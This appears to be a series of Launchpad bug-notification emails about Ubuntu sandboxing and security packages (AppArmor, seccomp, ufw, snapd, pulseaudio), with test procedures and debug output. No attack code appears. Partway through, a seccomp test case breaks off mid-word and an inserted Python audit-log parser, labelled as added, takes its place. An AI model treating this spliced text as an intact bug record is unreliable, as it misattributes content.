         Status: New

** Changed in: apparmor
       Status: New => In Progress

** Changed in: apparmor
     Assignee: (unassigned) => Jamie Strandboge (jdstrand)

-- 
https://bugs.launchpad.net/bugs/1794848

Title:
  private-files-strict abstraction should also limit access to directories

Status in AppArmor: Fix Released
Status in apparmor package in Ubuntu: In Progress
Status in apparmor source package in Trusty: Triaged
Status in apparmor source package in Xenial: Triaged
Status in apparmor source package in Bionic: Triaged
Status in apparmor source package in Cosmic: In Progress
[Group.of.nepali.translators] [Bug 1779914] Re: unsquashfs does not preserve sticky bit when run as non-root
** Changed in: squashfs-tools (Ubuntu Cosmic)
       Status: In Progress => Fix Committed

** Changed in: squashfs-tools (Ubuntu Trusty)
       Status: Triaged => In Progress

** Changed in: squashfs-tools (Ubuntu Xenial)
       Status: Triaged => In Progress

** Changed in: squashfs-tools (Ubuntu Bionic)
       Status: Triaged => In Progress

** Bug watch added: Debian Bug tracker #903085
   https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=903085

** Also affects: squashfs-tools (Debian) via
   https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=903085
     Importance: Unknown
         Status: Unknown

-- 
https://bugs.launchpad.net/bugs/1779914

Title:
  unsquashfs does not preserve sticky bit when run as non-root

Status in squashfs-tools package in Ubuntu: Fix Committed
Status in squashfs-tools source package in Trusty: In Progress
Status in squashfs-tools source package in Xenial: In Progress
Status in squashfs-tools source package in Bionic: In Progress
Status in squashfs-tools source package in Cosmic: Fix Committed
Status in squashfs-tools package in Debian: Unknown

Bug description:
  From https://sourceforge.net/p/squashfs/mailman/message/36343213/:

  "This set is an attempt to preserve the sticky bit when running unsquashfs as a non-root user. My main motivation for these changes is to improve reproducability when doing a sequence of "unsquashfs -> mksquashfs" as a non-root user but I think there's even more value in preserving the sticky bit in the case of a squashfs image containing a world-writable directory filled with files owned by a single user. Dropping the sticky bit could be considered to be a real bug in that scenario."
[Group.of.nepali.translators] [Bug 1726856] Re: ufw does not start automatically at boot
Wrt: the network-pre.target has this purpose: "Its primary purpose is for usage with firewall services that want to establish a firewall before any network interface is up"

I'm not sure network-pre.target existed at the time ufw added a systemd unit, but regardless, this sounds like exactly what we should be doing. Thanks for the triage!

** Changed in: ufw (Ubuntu)
   Status: New => Triaged

** Changed in: ufw (Ubuntu)
   Assignee: (unassigned) => Jamie Strandboge (jdstrand)

** Also affects: ufw (Ubuntu Bionic)
   Importance: Undecided
   Status: New

** Also affects: ufw (Ubuntu Cosmic)
   Importance: Undecided
   Assignee: Jamie Strandboge (jdstrand)
   Status: Triaged

** Also affects: ufw (Ubuntu Xenial)
   Importance: Undecided
   Status: New

** Also affects: ufw (Ubuntu Artful)
   Importance: Undecided
   Status: New

** Changed in: ufw (Ubuntu Xenial)
   Status: New => Triaged

** Changed in: ufw (Ubuntu Artful)
   Status: New => Triaged

** Changed in: ufw (Ubuntu Bionic)
   Status: New => Triaged

** Also affects: ufw
   Importance: Undecided
   Status: New

** Changed in: ufw
   Status: New => Triaged

** Changed in: ufw
   Assignee: (unassigned) => Jamie Strandboge (jdstrand)

** Changed in: ufw (Ubuntu Xenial)
   Assignee: (unassigned) => Jamie Strandboge (jdstrand)

** Changed in: ufw (Ubuntu Artful)
   Assignee: (unassigned) => Jamie Strandboge (jdstrand)

** Changed in: ufw (Ubuntu Bionic)
   Assignee: (unassigned) => Jamie Strandboge (jdstrand)

https://bugs.launchpad.net/bugs/1726856

Title: ufw does not start automatically at boot

Status in ufw: Triaged
Status in ufw package in Ubuntu: Triaged
Status in ufw source package in Xenial: Triaged
Status in ufw source package in Artful: Triaged
Status in ufw source package in Bionic: Triaged
Status in ufw source package in Cosmic: Triaged

Bug description:
  Whenever I boot into 17.10 ufw is always inactive, even though /etc/ufw/ufw.conf has this:

    # Set to yes to start on boot. If setting this remotely, be sure to add a rule
    # to allow your remote connection before starting ufw. Eg: 'ufw allow 22/tcp'
    ENABLED=yes

  ProblemType: Bug
  DistroRelease: Ubuntu 17.10
  Package: ufw 0.35-5
  ProcVersionSignature: Ubuntu 4.13.0-16.19-generic 4.13.4
  Uname: Linux 4.13.0-16-generic x86_64
  ApportVersion: 2.20.7-0ubuntu3
  Architecture: amd64
  CurrentDesktop: ubuntu:GNOME
  Date: Tue Oct 24 13:56:40 2017
  InstallationDate: Installed on 2015-04-01 (936 days ago)
  InstallationMedia: Ubuntu 14.04.1 LTS "Trusty Tahr" - Release amd64 (20140722.2)
  PackageArchitecture: all
  SourcePackage: ufw
  UpgradeStatus: Upgraded to artful on 2017-10-24 (0 days ago)
  mtime.conffile..etc.default.ufw: 2015-06-17T22:01:02.089170
[Group.of.nepali.translators] [Bug 1567597] Re: implement 'complain mode' in seccomp for developer mode with snaps
This is fixed in xenial 2.3.1-2.1ubuntu2~16.04.1

** Changed in: libseccomp (Ubuntu Xenial)
   Status: In Progress => Fix Released

https://bugs.launchpad.net/bugs/1567597

Title: implement 'complain mode' in seccomp for developer mode with snaps

Status in Snappy: In Progress
Status in libseccomp package in Ubuntu: Fix Released
Status in linux package in Ubuntu: Fix Released
Status in libseccomp source package in Xenial: Fix Released
Status in linux source package in Xenial: Fix Released
Status in libseccomp source package in Zesty: Fix Released
Status in linux source package in Zesty: Fix Released

Bug description:
  A requirement for snappy is that a snap may be placed in developer mode which will put the security sandbox in complain mode such that violations against policy are logged, but permitted. In this manner learning tools can be written to parse the logs, etc and make developing on snappy easier.

  Unfortunately with seccomp only SCMP_ACT_KILL logs to dmesg and while we can set complain mode to permit all calls, they are not logged at this time. I've discussed this with upstream and we are working together on the approach. This may require a kernel patch and an update to libseccomp, so filing this bug for now as a placeholder and we'll add other tasks as necessary.

  UPDATE: ubuntu-core-launcher now supports the '@complain' directive that is a synonym for '@unrestricted' so people can at least turn on developer mode and not be blocked by seccomp. Proper complain mode for seccomp needs to still be implemented (this bug).

  [Impact]
  Snapd needs a way to log seccomp actions without blocking any syscalls in order to have a more useful complain mode. Such functionality has been acked upstream and patches are on their way into the Linux 4.14 kernel (backported to 4.12.0-13.14 in artful).

  The corresponding libseccomp changes are still undergoing review (https://github.com/seccomp/libseccomp/pull/92). The pull request adds a number of new symbols and probably isn't appropriate to backport until upstream has acked the pull request. However, only a small part of that larger pull request is needed by snapd and that change can be safely backported since the only added symbol, the SCMP_ACT_LOG macro, must match the SECCOMP_RET_LOG macro that has already been approved and merged in the upstream Linux kernel.

  [libseccomp Test Case]
  A large number of tests are run as part of the libseccomp build. However, the "live" tests which test libseccomp with actual kernel enforcement are not run at that time. They can be manually exercised to help catch any regressions. Note that on Artful, there's an existing test failure (20-live-basic_die%%002-1):

  $ sudo apt build-dep -y libseccomp
  $ sudo apt install -y cython
  $ apt source libseccomp
  $ cd libseccomp-*
  $ autoreconf -ivf && ./configure --enable-python && make check-build
  $ (cd tests && ./regression -T live)

  All tests should pass on zesty (12 tests) and xenial (10 tests). On artful, you'll see one pre-existing failure:

  ...
  Test 20-live-basic_die%%002-1 result: FAILURE 20-live-basic_die TRAP rc=159
  ...
  Regression Test Summary
  tests run: 12
  tests skipped: 0
  tests passed: 11
  tests failed: 1
  tests errored: 0

  Now we can build and run a small test program to test the SCMP_ACT_LOG action in the way that snapd wants to use it for developer mode:

  $ sudo apt install -y libseccomp-dev
  $ gcc -o lp1567597-test lp1567597-test.c -lseccomp
  $ ./lp1567597-test

  With a kernel that contains the logging patches and an updated libseccomp, the exit code should be 0 and you should have an entry in the system log that looks like this:

  audit: type=1326 audit(1505859630.994:69): auid=1000 uid=1000 gid=1000 ses=2 pid=18451 comm="lp1567597-test" exe="/home/tyhicks/lp1567597-test" sig=0 arch=c03e syscall=2 compat=0 ip=0x7f547352c5c0 code=0x7ffc

  If you have an updated libseccomp with an old kernel, you'll see that seccomp_init() fails because the added compatibility check inside of libseccomp determines that the kernel doesn't have proper support for the new log action:

  $ ./lp1567597-test
  ERROR: seccomp_init: Invalid argument

  [Linux Kernel Test Case]
  All of the libseccomp test cases apply here. Running the seccomp kernel selftests is also a great way to exercise seccomp and the kernel patch set proposed for the SRU includes additional seccomp selftests. To build, enter into the root of the kernel source tree and build the seccomp test binary:

  $ make -C tools/testing/selftests TARGETS=seccomp

  Now you can execut
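The audit record above is exactly what a developer-mode "learning tool" has to consume. As an added example, not part of this bug or of snapd/libseccomp, here is a Python parser for type=1326 (AUDIT_SECCOMP) records that decodes the code= field into the seccomp action and separates calls that were merely logged (SECCOMP_RET_LOG) from calls the filter blocked. The sample lines are constructed in the kernel's audit format; note that a real record carries the full 32-bit action in code= (0x7ffc0000 for log) and the full arch value (c000003e for x86_64), both of which the scrape above truncates, and the syscall-name table is only for x86_64.

```python
import re

# Seccomp filter return actions from <linux/seccomp.h>.  The audit record's
# code= field is the filter's full 32-bit return value: the action lives in
# the top 16 bits, the low 16 bits carry data (the errno for SECCOMP_RET_ERRNO).
SECCOMP_RET_ACTION_FULL = 0xFFFF0000
SECCOMP_RET_DATA = 0x0000FFFF
SECCOMP_ACTIONS = {
    0x80000000: "kill_process",
    0x00000000: "kill_thread",   # historically SECCOMP_RET_KILL, i.e. SCMP_ACT_KILL
    0x00030000: "trap",
    0x00050000: "errno",
    0x7FC00000: "user_notif",
    0x7FF00000: "trace",
    0x7FFC0000: "log",           # SECCOMP_RET_LOG / SCMP_ACT_LOG: complain mode
    0x7FFF0000: "allow",
}
# Actions that stop the syscall outright.  trace/user_notif hand the decision
# to a supervisor, so they count as neither logged-only nor blocked here.
BLOCKING_ACTIONS = {"kill_process", "kill_thread", "trap", "errno"}

# AUDIT_ARCH_X86_64 and a few x86_64 syscall numbers relevant to this page.
AUDIT_ARCH_X86_64 = "c000003e"
X86_64_SYSCALLS = {
    0: "read", 1: "write", 2: "open", 41: "socket", 49: "bind", 50: "listen",
    59: "execve", 144: "sched_setscheduler", 179: "quotactl", 257: "openat",
}

_KV = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_seccomp_audit(line):
    """Return the key=value fields of one type=1326 record, else None."""
    fields = {k: v.strip('"') for k, v in _KV.findall(line)}
    if fields.get("type") != "1326" or "code" not in fields:
        return None
    return fields


def classify(fields):
    """Decode a parsed record into the action the seccomp filter returned."""
    code = int(fields["code"], 16)
    action = SECCOMP_ACTIONS.get(code & SECCOMP_RET_ACTION_FULL, "unknown")
    nr = int(fields["syscall"])
    name = str(nr)
    if fields.get("arch") == AUDIT_ARCH_X86_64:
        name = X86_64_SYSCALLS.get(nr, name)
    return {
        "comm": fields.get("comm"),
        "exe": fields.get("exe"),
        "syscall": name,
        "action": action,
        "blocked": action in BLOCKING_ACTIONS,
        # For SECCOMP_RET_ERRNO the low 16 bits are the errno the caller saw.
        "errno": code & SECCOMP_RET_DATA if action == "errno" else None,
    }


def classify_log(log_text):
    """Classify every seccomp record in a log, in order; other records skipped."""
    out = []
    for line in log_text.splitlines():
        fields = parse_seccomp_audit(line)
        if fields is not None:
            out.append(classify(fields))
    return out


def complain_mode_report(log_text):
    """What a developer-mode learning tool wants: per program, the syscalls
    the filter let through but flagged with SECCOMP_RET_LOG."""
    logged = {}
    for rec in classify_log(log_text):
        if rec["action"] == "log":
            logged.setdefault(rec["comm"], set()).add(rec["syscall"])
    return {comm: sorted(calls) for comm, calls in logged.items()}


# Constructed sample records (not copied from a real system): an open() logged
# under complain mode, a quotactl() killed by an SCMP_ACT_KILL filter, an
# unrelated type=1300 syscall record, and an open() refused with
# SECCOMP_RET_ERRNO(EPERM).
SAMPLE_LOG = """\
audit: type=1326 audit(1505859630.994:69): auid=1000 uid=1000 gid=1000 ses=2 pid=18451 comm="lp1567597-test" exe="/home/user/lp1567597-test" sig=0 arch=c000003e syscall=2 compat=0 ip=0x7f547352c5c0 code=0x7ffc0000
audit: type=1326 audit(1506000000.100:70): auid=4294967295 uid=0 gid=0 ses=4294967295 pid=12869 comm="transmission-da" exe="/snap/transmission/x1/bin/transmission-daemon" sig=31 arch=c000003e syscall=179 compat=0 ip=0x7fa06ab2d3fa code=0x0
audit: type=1300 audit(1506000000.200:71): arch=c000003e syscall=59 success=yes exit=0 pid=300 comm="sh"
audit: type=1326 audit(1506000000.300:72): auid=1000 uid=1000 gid=1000 ses=2 pid=400 comm="demo" exe="/usr/bin/demo" sig=0 arch=c000003e syscall=2 compat=0 ip=0x400000 code=0x50001
"""

if __name__ == "__main__":
    for rec in classify_log(SAMPLE_LOG):
        state = "BLOCKED" if rec["blocked"] else "passed"
        print(f'{rec["comm"]:<18} {rec["syscall"]:<12} {rec["action"]:<13} {state}')
    print("complain-mode report:", complain_mode_report(SAMPLE_LOG))
```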
[Group.of.nepali.translators] [Bug 1746463] Re: apparmor profile load in stacked policy container fails
Since this is going to be fixed in 'linux' and 'linux-gcp', adding tasks for those.

** Changed in: apparmor (Ubuntu Artful)
   Status: Won't Fix => Fix Committed

** Changed in: linux (Ubuntu Artful)
   Status: Fix Committed => Confirmed

** Also affects: linux-gcp (Ubuntu)
   Importance: Undecided
   Status: New

** Also affects: apparmor (Ubuntu Xenial)
   Importance: Undecided
   Status: New

** Also affects: linux (Ubuntu Xenial)
   Importance: Undecided
   Status: New

** Also affects: linux-gcp (Ubuntu Xenial)
   Importance: Undecided
   Status: New

** Changed in: apparmor (Ubuntu Xenial)
   Status: New => Won't Fix

** Changed in: linux (Ubuntu Xenial)
   Status: New => Invalid

** Changed in: linux-gcp (Ubuntu Artful)
   Status: New => Invalid

** Changed in: linux-gcp (Ubuntu Bionic)
   Status: New => Invalid

** Changed in: linux-gcp (Ubuntu Xenial)
   Status: New => Confirmed

https://bugs.launchpad.net/bugs/1746463

Title: apparmor profile load in stacked policy container fails

Status in snapd: Triaged
Status in apparmor package in Ubuntu: Confirmed
Status in linux package in Ubuntu: Confirmed
Status in linux-gcp package in Ubuntu: Invalid
Status in apparmor source package in Xenial: Won't Fix
Status in linux source package in Xenial: Invalid
Status in linux-gcp source package in Xenial: Confirmed
Status in apparmor source package in Artful: Fix Committed
Status in linux source package in Artful: Confirmed
Status in linux-gcp source package in Artful: Invalid
Status in apparmor source package in Bionic: Confirmed
Status in linux source package in Bionic: Confirmed
Status in linux-gcp source package in Bionic: Invalid

Bug description:
  LXD containers on an artful or bionic host with aa namespaces should be able to load the lxc policies. However /lib/apparmor/profile-load skips that part when running in a container.

  aa-status shows 0 policies

  /lib/apparmor/profile-load is failing due to is_container_with_internal_policy() failing due to /sys/kernel/security/apparmor/.ns_name being empty, which causes

    if [ "${ns_name#lxd-*}" = "$ns_name" ] && \
       [ "${ns_name#lxc-*}" = "$ns_name" ]; then
        return 1
    fi

  to fail
[Group.of.nepali.translators] [Bug 1733700] Re: python tools do not understand 'non-magic' include rules
Due to the builder being down for meltdown/spectre, the patches for this were delayed. However, the 3rd core snap without the issue (2.29.4.2, 2.30 and the upcoming 2.31.1) that caused this problem is about to be released, meaning the affected core snap revision is about to be reaped, which will resolve this bug for those users. As a result, marking all stable releases of Ubuntu as Won't Fix. Bionic will be fixed with the upcoming 2.12 merge from Debian.

** Changed in: apparmor (Ubuntu Zesty)
   Status: Triaged => Won't Fix

** Changed in: apparmor (Ubuntu Trusty)
   Status: In Progress => Won't Fix

** Changed in: apparmor (Ubuntu Xenial)
   Status: In Progress => Won't Fix

** Changed in: apparmor (Ubuntu Artful)
   Status: In Progress => Won't Fix

** Changed in: apparmor (Ubuntu Bionic)
   Status: In Progress => Triaged

** Changed in: apparmor (Ubuntu Bionic)
   Assignee: Jamie Strandboge (jdstrand) => (unassigned)

https://bugs.launchpad.net/bugs/1733700

Title: python tools do not understand 'non-magic' include rules

Status in AppArmor: Fix Released
Status in apparmor package in Ubuntu: Triaged
Status in apparmor source package in Trusty: Won't Fix
Status in apparmor source package in Xenial: Won't Fix
Status in apparmor source package in Zesty: Won't Fix
Status in apparmor source package in Artful: Won't Fix
Status in apparmor source package in Bionic: Triaged

Bug description:
  The apparmor parser supports 'include' and '#include' rules for specifying absolute paths, but the python tools only understand include rules for so called 'magic' '<>' file locations.

  = test case #0 (testsuite) =
  $ sudo apt-get install apparmor apparmor-utils # from proposed
  $ sudo apt-get build-dep apparmor
  $ sudo apt-get install quilt realpath pyflakes pyflakes3 # pyflakes3 on xenial and higher
  $ apt-get source apparmor # from proposed
  $ cd apparmor-*
  $ quilt push -a
  $ export PYTHONPATH=$(realpath libraries/libapparmor/swig/python)
  $ export PYTHON=/usr/bin/python3
  $ export PYTHON_VERSION=3
  $ export PYTHON_VERSIONS=python3
  $ cd libraries/libapparmor
  $ sh ./autogen.sh
  $ sh ./configure --prefix=/usr --with-perl --with-python
  $ make
  $ cd ../../binutils
  $ make
  $ cd ../parser
  $ make
  $ cd ../utils
  $ make
  $ make check

  = test case #1 (aa-enforce) =
  This assumes test case #0 has been performed.
  $ mkdir /tmp/test1 /tmp/test2
  $ cat /etc/apparmor.d/lp1733700
  profile lp1733700 {
    #include "/tmp/test1"
    include "/tmp/test2"
  }
  $ apparmor_parser -QTK /etc/apparmor.d/lp1733700 && echo ok
  $ sudo aa-enforce /etc/apparmor.d/lp1733700 # currently fails

  = test case #2 (aa-genprof) =
  This assumes test case #1 was already performed and /etc/apparmor.d/lp1733700 exists with the above includes.
  $ cat /tmp/lp1733700
  #!/bin/sh
  set -e
  sh -c "$@"
  $ chmod 755 /tmp/lp1733700

  # run without confinement:
  $ /tmp/lp1733700 'cat /etc/fstab' | head -1
  # /etc/fstab: static file system information.

  # invoke genprof
  $ sudo aa-genprof /tmp/lp1733700
  ...
  [(S)can system log for AppArmor events] / (F)inish
  - PRESS 's' - currently fails
  ...
  don't exercise the application any so we just have the default profile
  ...
  [(S)can system log for AppArmor events] / (F)inish
  - PRESS 'f'
  ...
  Finished generating profile for /tmp/lp1733700.

  $ sudo cat /etc/apparmor.d/tmp.lp1733700
  # Last Modified: Wed Dec 20 15:53:07 2017
  #include
  /tmp/lp1733700 {
    #include
    #include

    /bin/dash ix,
    /lib/x86_64-linux-gnu/ld-*.so mr,
    /tmp/lp1733700 r,
  }

  = test case #3 (aa-logprof) =
  This assumes test case #1 was already performed and /etc/apparmor.d/lp1733700 exists with the above includes. This also assumes test case #2 was already performed and /etc/apparmor.d/tmp.lp1733700 exists.

  Disable kernel rate limiting:
  $ sudo sysctl -w kernel.printk_ratelimit=0

  Create mark entry in syslog:
  $ logger mark-lp1733700

  Try running logprof with no new denials:
  $ sudo aa-logprof -m mark-lp1733700 # currently fails
  Reading log entries from /var/log/syslog.
  Updating AppArmor profiles in /etc/apparmor.d.
  $

  Adjust /etc/apparmor.d/tmp.lp1733700 to add:
    #include "/tmp/test1"
    include "/tmp/test2"

  Load it into the kernel:
  $ sudo apparmor_parser -r /etc/apparmor.d/tmp.lp1733700

  Create a new denial:
  $ /tmp/lp1733700 'uptime'
  sh: 1: uptime: Permission denied
  $

  Try running logprof:
  $ sudo aa-logprof -m mark-lp1733700 # currently fails
  Reading log entries from /var/log/syslog.
[Group.of.nepali.translators] [Bug 1734038] Re: snap-confine profile uses 'include' instead of '#include' which breaks apparmor-utils python tools
2.29.4 debs and 16-2.30 core snaps use:
  #include "/var/lib/snapd/apparmor/snap-confine.d"

This is sufficient to mark this bug Fix Released for snapd. For systems that are affected by this bug with older revisions of the core snap, please see the workaround in https://bugs.launchpad.net/ubuntu/+source/snapd/+bug/1734038/comments/15 and follow the progress in the apparmor bug: https://bugs.launchpad.net/bugs/1733700

** Changed in: snapd (Ubuntu Trusty)
   Status: New => Fix Released

** Changed in: snapd (Ubuntu Zesty)
   Status: Invalid => Fix Released

** Changed in: snapd (Ubuntu Artful)
   Status: New => Fix Released

** Changed in: snapd (Ubuntu Bionic)
   Status: In Progress => Fix Released

https://bugs.launchpad.net/bugs/1734038

Title: snap-confine profile uses 'include' instead of '#include' which breaks apparmor-utils python tools

Status in snapd package in Ubuntu: Fix Released
Status in snapd source package in Trusty: Fix Released
Status in snapd source package in Xenial: Fix Released
Status in snapd source package in Zesty: Fix Released
Status in snapd source package in Artful: Fix Released
Status in snapd source package in Bionic: Fix Released

Bug description:
  Issue found with Xenial kernel 4.4.0-102 and Zesty kernel 4.10.0-41, across different architectures.

  Multiple tests from ubuntu_qrt_apparmor test suite failed with the same error message:

    ERROR: Syntax Error: Unknown line found in file /etc/apparmor.d/usr.lib.snapd.snap-confine.real line 15:
    include "/var/lib/snapd/apparmor/snap-confine.d"
    /etc/ld.so.cache r,

  (BTW the include and this ld.so.cache are not in the same line, please refer to comment #3 for attachment)

  This issue will be gone if you downgrade the snapd and ubuntu-core-launcher package:
    sudo apt-get install snapd=2.28.5 ubuntu-core-launcher=2.28.5

  Debug information:
    ubuntu@kernel01:~$ snap version
    snap    2.29.3
    snapd   2.29.3
    series  16
    ubuntu  16.04
    kernel  4.4.0-102-generic
    ubuntu@kernel01:~$ apt list snapd
    Listing... Done
    snapd/xenial-proposed,now 2.29.3 s390x [installed]
    N: There are 2 additional versions. Please use the '-a' switch to see them.
    ubuntu@kernel01:~$ apt list apparmor -a
    Listing... Done
    apparmor/xenial-updates,now 2.10.95-0ubuntu2.7 s390x [installed]
    apparmor/xenial-security 2.10.95-0ubuntu2.6 s390x
    apparmor/xenial 2.10.95-0ubuntu2 s390x

  Steps to run the Apparmor test from QA Regression testing suite:
    1. git clone --depth 1 https://git.launchpad.net/qa-regression-testing
    2. sudo ./qa-regression-testing/scripts/test-apparmor.py

  ProblemType: Bug
  DistroRelease: Ubuntu 16.04
  Package: linux-image-4.4.0-102-generic 4.4.0-102.125
  ProcVersionSignature: Ubuntu 4.4.0-102.125-generic 4.4.98
  Uname: Linux 4.4.0-102-generic s390x
  NonfreeKernelModules: zfs zunicode zcommon znvpair zavl
  AlsaDevices: Error: command ['ls', '-l', '/dev/snd/'] failed with exit code 2: ls: cannot access '/dev/snd/': No such file or directory
  AplayDevices: Error: [Errno 2] No such file or directory: 'aplay'
  ApportVersion: 2.20.1-0ubuntu2.13
  Architecture: s390x
  ArecordDevices: Error: [Errno 2] No such file or directory: 'arecord'
  CRDA: Error: command ['iw', 'reg', 'get'] failed with exit code 1: nl80211 not found.
  CurrentDmesg:
  Date: Thu Nov 23 01:36:31 2017
  IwConfig: Error: [Errno 2] No such file or directory: 'iwconfig'
  Lspci:
  Lsusb: Error: command ['lsusb'] failed with exit code 1:
  PciMultimedia:
  ProcEnviron:
    TERM=xterm-256color
    PATH=(custom, no user)
    XDG_RUNTIME_DIR=
    LANG=C
    SHELL=/bin/bash
  ProcFB: Error: [Errno 2] No such file or directory: '/proc/fb'
  ProcKernelCmdLine: root=UUID=44b0b919-a1a4-4849-9425-e71d4ac87d85 crashkernel=196M BOOT_IMAGE=0
  RelatedPackageVersions:
    linux-restricted-modules-4.4.0-102-generic N/A
    linux-backports-modules-4.4.0-102-generic N/A
    linux-firmware 1.157.13
  RfKill: Error: [Errno 2] No such file or directory: 'rfkill'
  SourcePackage: linux
  UpgradeStatus: No upgrade log present (probably fresh install)
[Group.of.nepali.translators] [Bug 1733700] Re: python tools do not understand 'non-magic' include rules
This was fixed upstream in 2.12.

** Changed in: apparmor
   Status: In Progress => Fix Released

** Changed in: apparmor (Ubuntu Bionic)
   Status: Triaged => In Progress

** Changed in: apparmor (Ubuntu Bionic)
   Assignee: (unassigned) => Jamie Strandboge (jdstrand)

https://bugs.launchpad.net/bugs/1733700

Title: python tools do not understand 'non-magic' include rules

Status in AppArmor: Fix Released
Status in apparmor package in Ubuntu: In Progress
Status in apparmor source package in Trusty: Triaged
Status in apparmor source package in Xenial: Triaged
Status in apparmor source package in Zesty: Triaged
Status in apparmor source package in Artful: Triaged
Status in apparmor source package in Bionic: In Progress

Bug description:
  The apparmor parser supports 'include' and '#include' rules for specifying absolute paths, but the python tools only understand include rules for so called 'magic' '<>' file locations.

  = test case #1 (aa-enforce) =
  $ mkdir /tmp/test1 /tmp/test2
  $ cat /etc/apparmor.d/lp1733700
  profile lp1733700 {
    #include "/tmp/test1"
    include "/tmp/test2"
  }
  $ apparmor_parser -QTK /etc/apparmor.d/lp1733700 && echo ok
  $ sudo aa-enforce /etc/apparmor.d/lp1733700 # currently fails

  = test case #2 (aa-genprof) =
  This assumes test case #1 was already performed and /etc/apparmor.d/lp1733700 exists with the above includes.
  $ cat /tmp/lp1733700
  #!/bin/sh
  set -e
  sh -c "$@"

  # run without confinement:
  $ /tmp/lp1733700 'cat /etc/fstab' | head -1
  # /etc/fstab: static file system information.

  # invoke genprof
  $ sudo aa-genprof /tmp/lp1733700
  ...
  [(S)can system log for AppArmor events] / (F)inish
  - PRESS 's' - currently fails
  ...
  don't exercise the application any so we just have the default profile
  ...
  [(S)can system log for AppArmor events] / (F)inish
  - PRESS 'f'
  ...
  Finished generating profile for /tmp/lp1733700.

  $ sudo cat /etc/apparmor.d/tmp.lp1733700
  # Last Modified: Wed Dec 20 15:53:07 2017
  #include
  /tmp/lp1733700 {
    #include
    #include

    /bin/dash ix,
    /lib/x86_64-linux-gnu/ld-*.so mr,
    /tmp/lp1733700 r,
  }

  = test case #3 (aa-logprof) =
  This assumes test case #1 was already performed and /etc/apparmor.d/lp1733700 exists with the above includes. This also assumes test case #2 was already performed and /etc/apparmor.d/tmp.lp1733700 exists.

  Disable kernel rate limiting:
  $ sudo sysctl -w kernel.printk_ratelimit=0

  Create mark entry in syslog:
  $ logger mark-lp1733700

  Try running logprof with no new denials:
  $ sudo aa-logprof -m mark-lp1733700 # currently fails
  Reading log entries from /var/log/syslog.
  Updating AppArmor profiles in /etc/apparmor.d.
  $

  Adjust /etc/apparmor.d/tmp.lp1733700 to add:
    #include "/tmp/test1"
    include "/tmp/test2"

  Load it into the kernel:
  $ sudo apparmor_parser -r /etc/apparmor.d/tmp.lp1733700

  Create a new denial:
  $ /tmp/lp1733700 'uptime'
  sh: 1: uptime: Permission denied
  $

  Try running logprof:
  $ sudo aa-logprof -m mark-lp1733700 # currently fails
  Reading log entries from /var/log/syslog.
  Updating AppArmor profiles in /etc/apparmor.d.

  Profile:  /tmp/lp1733700
  Execute:  /usr/bin/uptime
  Severity: unknown

  (I)nherit / (C)hild / (N)amed / (X) ix On / (D)eny / Abo(r)t / (F)inish
  ...
  The following local profiles were changed. Would you like to save them?

  [1 - /tmp/lp1733700]

  (S)ave Changes / Save Selec(t)ed Profile / [(V)iew Changes] / View Changes b/w (C)lean profiles / Abo(r)t
  Writing updated profile for /tmp/lp1733700.
  $

  Verify the profile for 'uptime' addition and that the /tmp/test1 and /tmp/test2 includes were not removed (it is ok that they are both '#include'):
  $ sudo cat /etc/apparmor.d/tmp.lp1733700
  # Last Modified: Wed Dec 20 16:19:19 2017
  #include
  /tmp/lp1733700 {
    #include "/tmp/test1"
    #include "/tmp/test2"
    #include
    #include

    /bin/dash ix,
    /lib/x86_64-linux-gnu/ld-*.so mr,
    /tmp/lp1733700 r,
    /usr/bin/uptime mrix,
  }

  = test case #4 (aa-mergeprof) =
  $ mkdir -p /tmp/aa-mergeprof/new
  $ mkdir /tmp/aa-mergeprof/new/tunables /tmp/aa-mergeprof/new/abstractions
  $ touch /tmp/aa-mergeprof/new/tunables/global /tmp/aa-mergeprof/new/abstractions/base /tmp/aa-mergeprof/new/abstractions/bash
  $ cp -a /tmp/aa-mergeprof/new /tmp/aa-mergeprof/old
  $ cat /tmp/aa-mergeprof/old/tmp.lp1733700
  # no test2 include or cat
  #include
  /tmp/lp1733700 {
    #include
    #include
    #include "/tmp/test1"
    /bin/
[Group.of.nepali.translators] [Bug 1583057] Re: Deny audio recording for all snap applications
** Changed in: pulseaudio (Ubuntu Xenial)
   Status: In Progress => Won't Fix

https://bugs.launchpad.net/bugs/1583057

Title: Deny audio recording for all snap applications

Status in pulseaudio package in Ubuntu: Fix Released
Status in pulseaudio source package in Xenial: Won't Fix
Status in pulseaudio source package in Yakkety: Fix Released

Bug description:
  [Impact]
  Currently snaps on Ubuntu Classic may declare in their snap.yaml that they want access to pulseaudio. When installed, snapd will auto-connect the pulseaudio interface giving the snap access to the pulseaudio server for playback and recording. Because recording is allowed, snaps are allowed to eavesdrop on users without the user knowing. Phase 1 of the pulseaudio interface should block recording for snaps while the details of phase 2 (which combines pulseaudio/snappy interfaces and trust-store) are worked out.

  [Test Case]
  First, install pulseaudio then reboot (alternatively can 'killall pulseaudio' from within your session or logout then killall pulseaudio from a vt and then log back in). pulseaudio needs to be restarted for the changes to be in effect and a reboot is the easiest way to achieve that.

  1. unconfined can play audio
  2. unconfined can record audio
  3. non-snap confined can play audio
  4. non-snap confined can record audio
  5. snap confined can play audio
  6. snap confined cannot record audio
  7. snap confined devmode can record audio
  8. indicator-sound and 'Sound Settings...' works
  9. click can record audio if trust-store allows (eg, 'SnapRecorder' from the store)
  10. click can play audio (eg, playback of recording from 'SnapRecorder' from the store)

  Currently '6' is not implemented and all snaps may record audio. When this bug is fixed, no snaps should be able to record audio (until phase 2 is implemented which will be in a different bug).

  The attached script tests 1-7. 9 and 10 require testing on a device and using

  [Regression Potential]
  The patch is quite small and easy to understand and is implemented to only affect processes that want to record and are running with a security label that starts with 'snap.' Unconfined processes and processes running under other security labels should not be affected.

  Original description:
  Until we have a proper trust-store implementation with snappy and on the desktop/ubuntu core we want pulseaudio to simply deny any audio recording request coming from an app shipped as part of a snap.

  The implementation adds a module-snappy-policy module to pulseaudio which adds a hook for audio recording requests and checks on connection if the apparmor security label of the connecting peer starts with "snap." which will identify it as a snap application.

  Pulseaudio with the patch is available as part of the landing request at https://requests.ci-train.ubuntu.com/#/ticket/1428
[Group.of.nepali.translators] [Bug 1626359] Re: Cannot authorise quotactl syscall for Q_GETQUOTA
** Changed in: snapd (Ubuntu)
   Status: Triaged => Fix Released

** Changed in: snappy
   Status: In Progress => Fix Released

https://bugs.launchpad.net/bugs/1626359

Title: Cannot authorise quotactl syscall for Q_GETQUOTA

Status in Snappy: Fix Released
